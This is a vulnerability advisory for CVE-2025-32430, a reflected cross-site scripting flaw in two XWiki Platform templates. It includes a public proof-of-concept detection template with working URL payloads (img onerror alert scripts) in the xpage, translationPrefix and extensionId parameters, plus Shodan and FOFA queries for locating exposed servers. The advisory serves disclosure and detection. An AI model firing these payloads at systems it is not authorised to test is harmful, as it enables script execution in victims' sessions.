CVE-2025-32430: XWiki Platform - Cross-Site Scripting

Date: 2025-08-01 | Affected software: XWiki Platform | PoC: public

Vulnerability description

XWiki Platform versions >= 4.2-milestone-3 and < 16.4.8, >= 16.5.0-rc-1 and < 16.10.6, and >= 17.0.0-rc-1 and < 17.3.0-rc-1 are vulnerable to reflected XSS in two templates. As the PoC below shows, both templates are reached through the `xpage` request parameter and echo attacker-controlled parameters into the HTML response without escaping: `translationPrefix` in the `job_status_json` template (reflected as `<prefix>.notFound` on the 404 page returned for an unknown `jobId`) and `extensionId` / `extensionVersionConstraint` in the `distribution` template. An attacker who gets a victim to open a crafted URL can therefore execute arbitrary JavaScript in the context of the victim's session. Because the payload lives entirely in the URL, no prior access to the wiki is needed to craft it; the fixed versions are 16.4.8, 16.10.6 and 17.3.0-rc-1.

PoC code [public]

id: CVE-2025-32430

info:
  name: XWiki Platform - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    XWiki Platform versions >= 4.2-milestone-3 and < 16.4.8, >= 16.5.0-rc-1 and < 16.10.6, and >= 17.0.0-rc-1 and < 17.3.0-rc-1 are vulnerable to reflected XSS in two templates. The vulnerability allows an attacker to execute malicious JavaScript code in the context of the victim's session by getting the victim to visit an attacker-controlled URL.
  reference:
    - https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-m9x4-w7p9-mxhx
    - https://jira.xwiki.org/browse/XWIKI-23096
    - https://nvd.nist.gov/vuln/detail/CVE-2025-32430
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H
    cvss-score: 6.5
    cve-id: CVE-2025-32430
    epss-score: 0.00304
    epss-percentile: 0.53255
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 2
    vendor: xwiki
    product: xwiki-platform
    shodan-query: http.html:"data-xwiki-reference"
    fofa-query: body="data-xwiki-reference"
  tags: cve,cve2025,xwiki,xss

http:
  - raw:
      - |
        GET /xwiki/bin/view/Main/?xpage=job_status_json&jobId=asdf&translationPrefix=%3Cimg%20src=1%20onerror=alert(document.domain)%3E HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /xwiki/bin/view/Main/?xpage=distribution&extensionId=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&extensionVersionConstraint=%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<img src=1 onerror=alert(document.domain)>.notFound'

      - type: word
        part: content_type
        words:
          - 'text/html'

      - type: status
        status:
          - 404
# digest: 4a0a00473045022100d2cfa2d086f2265c22a738105b619080ffdc1b339300cf44363679d719ef78d6022037f51e72715a7498b97cc16e75078f5730a56c1e40ede25a80826dfb9e8353f2:922c64590222798bb761d5b6d8e72950
